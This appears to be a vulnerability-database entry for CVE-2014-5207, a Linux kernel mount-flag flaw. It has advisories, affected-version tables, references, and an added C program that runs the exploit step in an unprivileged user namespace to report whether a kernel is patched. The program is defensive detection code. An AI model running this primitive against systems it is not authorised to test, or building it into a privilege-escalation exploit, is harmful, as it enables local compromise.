CVE-2014-5207
Published: 2014-08-18
Priority: P4 · severity medium · CVSS 2.0 base score 6.2 (AV:L/AC:H/Au:N/C:C/I:C/A:C)
Exploit: public PoC available (exploit-db 34923, Packet Storm 128595; see references)
EPSS: 0.89% (54.8th percentile)
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
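The following C program is an added example, not code from this page or from the kernel project. It models the check the fixed kernel performs (which locked per-mount bits a bind remount would drop, and the atime mode it would change), then runs the live test the Bugzilla comment below describes: enter an unprivileged user and mount namespace and issue a bind remount of a nosuid mount with no MS_NOSUID in the request. A patched kernel refuses with EPERM; a vulnerable one clears the bit, which statvfs() shows as ST_NOSUID disappearing. Assumptions: the target (argv[1], default /dev/shm) is mounted nosuid in the parent namespace, unprivileged user namespaces are enabled, and all function names here (locked_bits_cleared, atime_mode_of, classify, mount_flags_of, write_str) are this example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/statvfs.h>
#ifndef CLONE_NEWUSER              /* kernel ABI constants, in case _GNU_SOURCE took effect too late */
#define CLONE_NEWNS   0x00020000
#define CLONE_NEWUSER 0x10000000
#endif
int unshare(int flags);            /* glibc's prototype, repeated for the same reason */

/* Per-mount flags the fixed kernel locks (MNT_LOCK_*) on mounts copied into a mount
 * namespace owned by a less-privileged user namespace, in userspace MS_* terms. */
#define LOCKABLE_FLAGS (MS_RDONLY | MS_NOSUID | MS_NODEV | MS_NOEXEC)

/* Locked bits a remount request would drop. A vulnerable kernel applied such a request
 * (this CVE); the fixed do_remount() refuses it with EPERM. */
unsigned locked_bits_cleared(unsigned locked, unsigned requested)
{
    return (locked & LOCKABLE_FLAGS) & ~requested;
}

/* do_mount() folds the MS_* atime bits into one mode (strictatime beats noatime beats
 * relatime); the fix locks that mode too (MNT_LOCK_ATIME), so changing it is refused. */
enum { ATIME_RELATIME, ATIME_NOATIME, ATIME_STRICT };
int atime_mode_of(unsigned ms_flags)
{
    if (ms_flags & MS_STRICTATIME) return ATIME_STRICT;
    return ms_flags & MS_NOATIME ? ATIME_NOATIME : ATIME_RELATIME;
}

/* Verdict from the target's statvfs() f_flag before the remount attempt, the mount(2)
 * return code and errno, and f_flag afterwards. */
enum verdict { PATCHED, VULNERABLE, INCONCLUSIVE, UNTESTABLE };
enum verdict classify(unsigned long before, int mount_rc, int err, unsigned long after)
{
    if (!(before & ST_NOSUID)) return UNTESTABLE;    /* nothing is locked; pick another target */
    if (mount_rc != 0) return err == EPERM ? PATCHED : UNTESTABLE;
    return after & ST_NOSUID ? INCONCLUSIVE : VULNERABLE;
}

static unsigned long mount_flags_of(const char *path)   /* per-mount flags as the kernel reports them */
{
    struct statvfs st;
    return statvfs(path, &st) == 0 ? st.f_flag : 0;
}

static void write_str(const char *path, const char *s)  /* best effort: setgroups is absent before 3.19 */
{
    int fd = open(path, O_WRONLY);
    if (fd >= 0) { if (write(fd, s, strlen(s)) < 0) perror(path); close(fd); }
}

/* Live check: enter a fresh user+mount namespace as an unprivileged user, then bind-remount
 * the target without MS_NOSUID. Assumes the target (argv[1], default /dev/shm) is nosuid. */
int main(int argc, char **argv)
{
    static const char *names[] = { "patched", "VULNERABLE", "inconclusive", "untestable" };
    const char *target = argc > 1 ? argv[1] : "/dev/shm";
    char map[64];
    unsigned long before = mount_flags_of(target), after = 0;
    if (!(before & ST_NOSUID)) { fprintf(stderr, "%s is not nosuid here; pass another target\n", target); return 2; }
    unsigned uid = getuid(), gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0) { perror("unshare (user namespaces disabled?)"); return 2; }
    write_str("/proc/self/setgroups", "deny");
    snprintf(map, sizeof map, "0 %u 1", uid); write_str("/proc/self/uid_map", map);
    snprintf(map, sizeof map, "0 %u 1", gid); write_str("/proc/self/gid_map", map);
    /* The CVE-2014-5207 primitive: a bind remount that requests none of the locked bits. */
    int rc = mount(NULL, target, NULL, MS_REMOUNT | MS_BIND, NULL), err = errno;
    if (rc == 0) after = mount_flags_of(target);
    enum verdict v = classify(before, rc, err, after);
    printf("%s: %s (mount rc=%d, %s)\n", names[v], target, rc, rc ? strerror(err) : "remount accepted");
    return v == VULNERABLE ? 1 : v == PATCHED ? 0 : 2;
}
```

Build with `cc -Wall -o remount-check remount-check.c` and run as an ordinary user; exit status 0 means patched, 1 vulnerable, 2 untestable or inconclusive. The raw mount(2) call is used rather than mount(8) so that the request really carries no MS_NOSUID bit. If unshare() itself fails, unprivileged user namespaces are disabled on that host (on Debian and Ubuntu kernels via the kernel.unprivileged_userns_clone sysctl), which means unprivileged users cannot reach the primitive at all; that is also why Red Hat lists its kernels as not affected.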
Affected
Nine source ranges, deduplicated below. "3.16.2-1" is a Debian package version and "3.13.0-34.60" an Ubuntu 14.04 kernel package version, not upstream kernel versions; the upstream fix is commit 9566d6742852c527bf5af38af5cbb878dad75705 (see references).
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| debian | linux | < 3.16.2-1 (bookworm, bullseye, trixie, forky, sid) | 3.16.2-1 |
| linux | linux_kernel | <= 3.16.1 (NVD) | — |
| linux | linux_kernel | >= 0 < 3.16.2-1 | 3.16.2-1 |
| linux | linux_kernel | >= 0 < 3.13.0-34.60 | 3.13.0-34.60 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 2.0 | 6.2 | MEDIUM | AV:L/AC:H/Au:N/C:C/I:C/A:C |
| OSV | — | 7.2 | HIGH | — |
| vendor_ubuntu | — | 7.2 | HIGH | — |
| vendor_debian | — | 6.2 | MEDIUM | — |
| vendor_redhat | — | 6.2 | MEDIUM | — |
The 7.2 ratings are consistent with the CVSS 2.0 vector AV:L/AC:L/Au:N/C:C/I:C/A:C, i.e. the same complete impact as NVD's vector with access complexity rated low rather than high; that single metric accounts for the MEDIUM/HIGH split.
Ubuntu
Linux kernel (Trusty HWE) vulnerabilities
vendor_ubuntu · 2014-08-18 · CVSS 7.2 (HIGH) · covers CVE-2014-5206 and CVE-2014-5207
Summary: Several security issues were fixed in the kernel.
Eric W. Biederman discovered a flaw with the mediation of mount flags in
the Linux kernel's user namespace subsystem. An unprivileged user could
exploit this flaw to bypass mount restrictions, and potentially gain
administrative privileges. (CVE-2014-5207)
Kenton Varda discovered a flaw with read-only bind mounts when used with
user namespaces. An unprivileged local user could exploit this flaw to gain
full write privileges to a mount that should be read only. (CVE-2014-5206)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu · 2014-08-18 · CVSS 7.2 (HIGH) · covers CVE-2014-5206 and CVE-2014-5207
Summary: Several security issues were fixed in the kernel.
Eric W. Biederman discovered a flaw with the mediation of mount flags in
the Linux kernel's user namespace subsystem. An unprivileged user could
exploit this flaw to bypass mount restrictions, and potentially gain
administrative privileges. (CVE-2014-5207)
Kenton Varda discovered a flaw with read-only bind mounts when used with
user namespaces. An unprivileged local user could exploit this flaw to gain
full write privileges to a mount that should be read only. (CVE-2014-5206)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, whic
Red Hat
kernel: mount flags handling during remount
vendor_redhat · 2014-08-01 · CVSS 6.2 (MEDIUM)
Statement: Not vulnerable.
This issue did not affect the versions of kernel as shipped with Red Hat Enterprise Linux 5, 6, 7, and Red Hat Enterprise Linux MRG 2.
Package: kernel (Red Hat Enterprise Linux 5) - Not affected
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Package: kern
Debian
linux: CVE-2014-5207
vendor_debian · 2014 · CVSS 6.2 (MEDIUM)
Scope: local
bookworm: resolved (fixed in 3.16.2-1)
bullseye: resolved (fixed in 3.16.2-1)
forky: resolved (fixed in 3.16.2-1)
sid: resolved (fixed in 3.16.2-1)
trixie: resolved (fixed in 3.16.2-1)
GHSA
GHSA-gv3p-vh66-pccp: fs/namespace
ghsa_unreviewed · 2022-05-13 · MEDIUM · CWE-269 (Improper Privilege Management)
Kernel
fs: Treat foreign mounts as nosuid
kernel_security · 2016-06-23 · CVSS 6.2 (MEDIUM)
This 2016 commit is a later hardening of the same attack surface (setuid files on mounts owned by another user namespace), not the fix for CVE-2014-5207 itself; the fix is commit 9566d6742852c527bf5af38af5cbb878dad75705, listed in the references and among the proposed patches in the Bugzilla entry below.
If a process gets access to a mount from a different user
namespace, that process should not be able to take advantage of
setuid files or selinux entrypoints from that filesystem. Prevent
this by treating mounts from other mount namespaces and those not
owned by current_user_ns() or an ancestor as nosuid.
This will make it safer to allow more complex filesystems to be
mounted in non-root user namespaces.
This does not remove the need for MNT_LOCK_NOSUID. The setuid,
setgid, and file capability bits can no longer be abused if code in
a user namespace were to clear nosuid on an untrusted filesystem,
but this patch, by itself, is insufficient to protect the system
from abuse of files that, when execed, would increase MAC privilege.
As a more concrete exp
OSV
linux vulnerabilities
osv · 2014-08-18 · CVSS 7.2 (HIGH)
Eric W. Biederman discovered a flaw with the mediation of mount flags in
the Linux kernel's user namespace subsystem. An unprivileged user could
exploit this flaw to bypass mount restrictions, and potentially gain
administrative privileges. (CVE-2014-5207)
Kenton Varda discovered a flaw with read-only bind mounts when used with
user namespaces. An unprivileged local user could exploit this flaw to gain
full write privileges to a mount that should be read only. (CVE-2014-5206)
OSV
CVE-2014-5207: fs/namespace
osv · 2014-08-18 · CVSS 6.2 (MEDIUM)
Bugzilla
CVE-2014-5207 CVE-2014-5206 kernel: ro bind mount bypass using user namespaces [fedora-all]
bugzilla · 2014-08-13 · CVSS 7.2 (HIGH)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supporte
Bugzilla
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
bugzilla · 2014-08-13 · CVSS 7.2 (HIGH)
It was discovered that a privileged user in the user namespace with access to a bind mount can clear certain mount flags by calling "mount --bind -o remount,... ...".
Proposed patches:
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=a6138db815df5ee542d848318e5dae681590fccd
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=07b645589dcda8b7a5249e096fece2a67556f0f4
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=9566d6742852c527bf5af38af5cbb878dad75705
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=ffbc6f0ead47fa5a1dc9642b0331cb75c
References
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=9566d6742852c527bf5af38af5cbb878dad75705
http://osvdb.org/show/osvdb/110055
http://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.html
http://seclists.org/oss-sec/2014/q3/352
http://www.exploit-db.com/exploits/34923
http://www.openwall.com/lists/oss-security/2014/08/13/4
http://www.securityfocus.com/bid/69216
http://www.ubuntu.com/usn/USN-2317-1
http://www.ubuntu.com/usn/USN-2318-1
https://bugzilla.redhat.com/show_bug.cgi?id=1129662
https://exchange.xforce.ibmcloud.com/vulnerabilities/95266
https://github.com/torvalds/linux/commit/9566d6742852c527bf5af38af5cbb878dad75705